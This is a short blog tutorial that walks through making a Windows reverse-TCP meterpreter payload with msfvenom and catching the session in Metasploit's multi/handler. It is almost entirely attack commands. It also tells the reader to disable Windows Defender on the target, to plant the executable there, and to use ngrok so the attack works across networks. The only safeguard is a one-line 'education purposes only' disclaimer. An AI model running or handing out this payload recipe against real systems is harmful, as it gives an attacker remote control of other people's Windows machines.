Welcome to College Techies, the place for nerds to find the best Tech and IT related news, reviews, tutorials and more!!

Create malicious payloads (meterpreter session using reverse tcp) using metasploit and msfvenom for windows


Anyone who has used Kali Linux and is familiar with Penetration Testing will know about or atleast would have hear about the Metasploit Framework. For the uninitiated, the Metasploit Framework is basically a huge database that is constantly update with exploits and vulnerabilities. It was developed by Rapid7. And today we will learn how to use this framework to establish a basic reverse tcp payload in a windows machine. This is really basic, and for those who are practicing this, make sure to disable Windows Defender and other Anti Virus programs in the target machine(it has obviously been patched).

NOTE: THIS IS FOR EDUCATION PURPOSES ONLY!! WE ARE NOT LIABLE OR WILL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THIS INFORMATION!! 

Requirements

  • Kali Linux(obviously)
  • A target machine which has windows running on it.

Steps

1. Make sure to update and upgrade your Kali packages by running "apt update" and then "apt upgrade". NOTE: THIS MIGHT TAKE SOME TIME.

2. The next step is to create a payload for a 64-bit version of windows(also possible for 32-bit). Execute "msfvenom -p windows/x64/meterpreter/reverse_tcp -i 10 -f exe lhost=VALUE lport=VALUE -o FILE_NAME.exe". 

NOTE: ENTER YOUR IP ADDRESS AND A RANDOM DYNAMIC PORT AS THE VALUES FOR lhost AND lport. ALSO REPLACE FILE_NAME WITH A FILE NAME OF YOUR CHOICE. IT WILL BE THE NAME OF THE PAYLOAD. 

NOTE: IF YOU ARE USING A SOFTWARE LIKE NGROK TO EXECUTE THIS ATTACK OVER DIFFERENT NETWORKS, MAKE SURE TO ENTER lhost AND lport VALUES PROVIDED BY NGROK.

3. After creating the payload, search for it in your machine and upload it to your target machine(usually will be located in the root folder).

4. Launch the Metasploit Framework by executing "msfconsole". The Metasploit Framework will open up.


5. Once Metasploit opens up, execute "use exploit/multi/handler" to use the multi/handler module.

 

6. Then set the payload using, "set payload windows/x64/meterpreter/reverse_tcp". Also set the lhost and lport by executing "set lhost VALUE" and "set lport VALUE". Make sure you set the values as the ones you used while creating the payload in step 2.

7. By the time you set all of these options, make sure you also install and execute the payload in the target machine.

8. Lastly, just type in "exploit" and wait for a few minutes. A meterpreter session should have started with your target machine!!

Comments

Popular Posts